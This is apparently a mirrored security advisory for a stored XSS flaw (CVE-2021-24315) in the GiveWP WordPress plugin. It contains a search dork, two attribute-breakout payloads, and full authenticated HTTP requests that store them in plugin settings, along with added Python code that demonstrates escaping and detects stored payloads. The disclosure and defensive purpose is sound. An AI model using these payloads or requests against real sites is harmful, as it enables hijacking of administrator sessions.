GiveWP WordPress Plugin <= 2.10.3 - Authenticated Persistent XSS

CVE:               CVE-2021-24315
Category:          CWE-79
Price:             Not specified
Severity:          High
Author:            Seth Law (Pethical)
Risk:              High
Exploitation Type: Remote
Date:              2021-05-17
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050095

Below is a copy:

GiveWP WordPress Plugin <= 2.10.3 - Authenticated Persistent XSS
/*!
- # VULNERABILITY: GiveWP WordPress Plugin <= 2.10.3 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/give/
- # DATE: 2021-04-02
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: GiveWP [ https://givewp.com ]
- # SOFTWARE VERSION: <= 2.10.3
- # SOFTWARE LINK: https://wordpress.org/plugins/give/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24315
*/



### -- [ Info: ]

[i] An authenticated persistent (stored) XSS vulnerability was discovered in the GiveWP plugin through v2.10.3 for WordPress. A user who can save the plugin's settings (PR:H in the CVSS vector, i.e. an administrator) can store a value that is later printed back into the settings page without proper output escaping, so the injected script runs every time that page is viewed.

[i] Vulnerable parameter(s): &stripe_checkout_background_image= (Stripe Checkout background image) and &email_logo= (email logo), both settings that are meant to hold an image URL.



### -- [ Impact: ]

[~] Arbitrary JavaScript stored in the affected settings runs in the browser of any privileged user who opens that settings page. The payload can be combined with other attack vectors (for example performing actions with the victim's privileges), which can lead to a complete compromise of the site.

[~] Caveat: the vector is PR:H, so the attacker already needs a role that can save GiveWP settings, and the request must carry a valid _give-save-settings nonce (see the PoCs below), so it cannot be triggered cross-site. On a single-site WordPress install administrators normally hold the unfiltered_html capability anyway; the finding matters most on multisite installs or on sites with DISALLOW_UNFILTERED_HTML set, where that capability has been removed.



### -- [ Payloads: ]

[$] m0ze" autofocus onfocus=alert(document.cookie); "

[$] m0ze" autofocus onfocus=alert(document.domain); "

[i] Both payloads are HTML attribute breakouts: the leading double quote closes the attribute the setting is printed into, autofocus onfocus=... adds an event handler that fires as soon as the page loads (no victim interaction, matching UI:N in the vector above), and the trailing double quote re-balances the quoting so the rest of the tag still parses.
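To show what the payloads above do to the markup, here is an added Python example (not from the advisory and not GiveWP code). It renders a setting into a text input the way a vulnerable settings page would, beside a version that escapes for attribute context, and parses both with the standard library's HTMLParser to list the attributes a browser would see. The input name and the exact rendering are hypothetical; WordPress's esc_attr() escapes the same characters as html.escape(quote=True).

```python
"""Attribute breakout vs. escaped output for a stored GiveWP setting.

Added illustration, not GiveWP code: the settings page is assumed (hypothetically)
to print the saved option straight into value="..." of a text input.
"""
import html
from html.parser import HTMLParser

# Payload from the advisory (copied here as the example's sample input).
PAYLOAD = 'm0ze" autofocus onfocus=alert(document.cookie); "'


def render_vulnerable(name: str, value: str) -> str:
    """Interpolates the stored option without escaping (the vulnerable pattern)."""
    return f'<input type="text" name="{name}" value="{value}">'


def render_fixed(name: str, value: str) -> str:
    """Escapes the value for an HTML attribute context before printing it."""
    return f'<input type="text" name="{name}" value="{html.escape(value, quote=True)}">'


class _InputAttrs(HTMLParser):
    """Collects the attributes the parser sees on the first <input> tag."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)


def parsed_input_attrs(markup: str) -> dict:
    """Returns {attribute: value} for the first <input> in the markup."""
    parser = _InputAttrs()
    parser.feed(markup)
    return parser.attrs or {}


def has_event_handler(attrs: dict) -> bool:
    """True if any attribute is an on* event handler, i.e. script would run."""
    return any(key.lower().startswith("on") for key in attrs)


if __name__ == "__main__":
    for label, renderer in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        markup = renderer("stripe_checkout_background_image", PAYLOAD)
        attrs = parsed_input_attrs(markup)
        print(f"{label}: {markup}")
        print(f"  attributes: {attrs}")
        print(f"  executes script: {has_event_handler(attrs)}")
```

In the vulnerable rendering the parser reports autofocus and onfocus as separate attributes of the input, which is exactly what a browser does; in the escaped rendering the whole payload stays inside the value attribute, and the parser hands it back unchanged as a plain string.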



### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]

[!] POST /wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=gateways&section=stripe-settings&group=checkout HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------298112530519342307931729900289
Content-Length: 3549
Cookie: [admin cookies]

-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_statement_descriptor"

PoC by m0ze
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_cc_fields_format"

multi
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_checkout_type"

modal
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_checkout_name"

PoC by m0ze
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_checkout_background_image"

m0ze" autofocus onfocus=alert(document.cookie); "
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_hide_icon"

enabled
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_icon_style"

default
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_mandate_acceptance_option"

enabled
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_mandate_acceptance_text"

A refund must be claimed within 8 weeks starting from the date on which your account was debited.
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_becs_hide_icon"

enabled
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_becs_icon_style"

default
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_becs_mandate_acceptance_option"

enabled
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="stripe_becs_mandate_acceptance_text"

You certify that you are either an account holder or an authorized signatory on the account listed above.
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="_give-save-settings"

88a432b100
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=gateways&section=stripe-settings&group=checkout
-----------------------------298112530519342307931729900289
Content-Disposition: form-data; name="save"

Save changes
-----------------------------298112530519342307931729900289--



### -- [ PoC #2 | Authenticated Persistent XSS | Logo (Email Settings): ]

[!] POST /wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=emails&section=email-settings HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------3829962343981723866336357850
Content-Length: 1077
Cookie: [admin cookies]

-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="email_template"

default
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="email_logo"

m0ze" autofocus onfocus=alert(document.cookie); "
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="from_name"

PoC by m0ze
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="from_email"

[email protected]
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="_give-save-settings"

88a432b100
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=emails&section=email-settings
-----------------------------3829962343981723866336357850
Content-Disposition: form-data; name="save"

Save changes
-----------------------------3829962343981723866336357850--
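Both PoCs leave the payload in the plugin's saved settings, so the first incident-response question is whether such a value is already stored on a site. The following added Python check (not from the advisory and not GiveWP code) triages an exported copy of those settings. It assumes, without having verified it against the plugin's code, that GiveWP keeps the settings in one option named give_settings that can be exported with WP-CLI as JSON (wp option get give_settings --format=json); the sample export embedded below is constructed for the example, with the advisory's payload planted in email_logo.

```python
"""Triage: has an attribute-breakout payload been stored in the affected GiveWP options?

Added example. Assumption (not verified against the plugin): the settings live in a
single option exported as JSON, e.g. `wp option get give_settings --format=json`.
Both affected keys should hold an image URL, so anything else is worth a look.
"""
import json
import re
from urllib.parse import urlparse

# Settings keys named in the advisory.
AFFECTED_KEYS = ("stripe_checkout_background_image", "email_logo")

# Characters that close or escape an HTML attribute context, and on*= handlers.
_BREAKOUT = re.compile(r'["\'<>]')
_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)


def is_plain_url(value: str) -> bool:
    """Accept only http(s) URLs that contain no quote or angle-bracket characters."""
    if _BREAKOUT.search(value):
        return False
    parts = urlparse(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def classify(value: str) -> str:
    """Returns 'ok', 'empty', 'event_handler', 'breakout' or 'not_a_url'."""
    if value == "":
        return "empty"
    if _HANDLER.search(value):
        return "event_handler"
    if _BREAKOUT.search(value):
        return "breakout"
    if not is_plain_url(value):
        return "not_a_url"
    return "ok"


def triage(settings: dict) -> list:
    """Returns [(key, verdict, value)] for every affected key whose value is not clean."""
    findings = []
    for key in AFFECTED_KEYS:
        value = settings.get(key, "")
        if not isinstance(value, str):
            value = str(value)
        verdict = classify(value)
        if verdict not in ("ok", "empty"):
            findings.append((key, verdict, value))
    return findings


def triage_json(text: str) -> list:
    """Same as triage() but takes the raw JSON export."""
    return triage(json.loads(text))


# Constructed sample export (hypothetical site); email_logo holds the advisory's payload.
SAMPLE_EXPORT = json.dumps({
    "stripe_checkout_background_image": "https://example.com/wp-content/uploads/bg.png",
    "email_logo": 'm0ze" autofocus onfocus=alert(document.cookie); "',
    "from_name": "PoC by m0ze",
})

if __name__ == "__main__":
    for key, verdict, value in triage_json(SAMPLE_EXPORT):
        print(f"{key}: {verdict}: {value!r}")
```

A hit on either key is the stored artifact of this attack; from there, the question for the investigation is which privileged account saved that settings page, since the nonce in the PoCs means the save had to come from an authenticated session.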



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
